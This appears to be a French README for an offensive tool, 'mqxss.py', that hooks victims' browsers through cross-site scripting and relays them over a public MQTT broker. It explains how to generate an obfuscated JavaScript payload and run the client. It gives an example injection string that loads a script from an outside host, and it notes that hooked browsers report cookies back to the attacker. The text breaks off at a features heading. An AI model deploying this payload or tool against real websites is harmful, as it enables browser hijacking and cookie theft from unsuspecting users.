
Communication de navigateur hooké via MQTT

L'avantage d'utiliser cet outil plutôt que beef ou xsshunter est qu'en plus d'héberger le payload js, il n'y a aucune infrastructure à mettre en place. Vous pouvez utiliser un broker public (l'outil utilise actuellement de l'obfuscation ; le chiffrement est en cours de développement).
Les navigateurs hookés communiqueront sur le sujet MQTT (topic) du broker que vous spécifiez. Il existe de nombreux brokers publics/gratuits pour tester cela.
Le client utilise la bibliothèque Python paho.mqtt, tandis que le payload js utilise 'mqttws31.min.js', qu'il récupère depuis 'https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.min.js'.

Pour générer un payload JS afin de hooker des navigateurs, définissez le flag -g au moment de l'exécution, ainsi que les variables de votre broker, port et topic. Cela créera votre payload dans le dossier /js/.
Pour exécuter le client, fournissez votre broker, port et topic comme suit
mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname
Pour exécuter le client avec des identifiants, fournissez votre broker, port, nom d'utilisateur, mot de passe et topic comme suit
mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password
Envoyez votre payload XSS à la victime pendant que le client mqxss est en cours d'exécution, ex : '"><script src=https://example.com/x.js async></script> ou quelque chose de similaire. Si le site est vulnérable, vous devriez recevoir une notification indiquant que le navigateur s'est connecté, avec quelques informations de base, notamment les cookies, etc.

Fonctionnalités :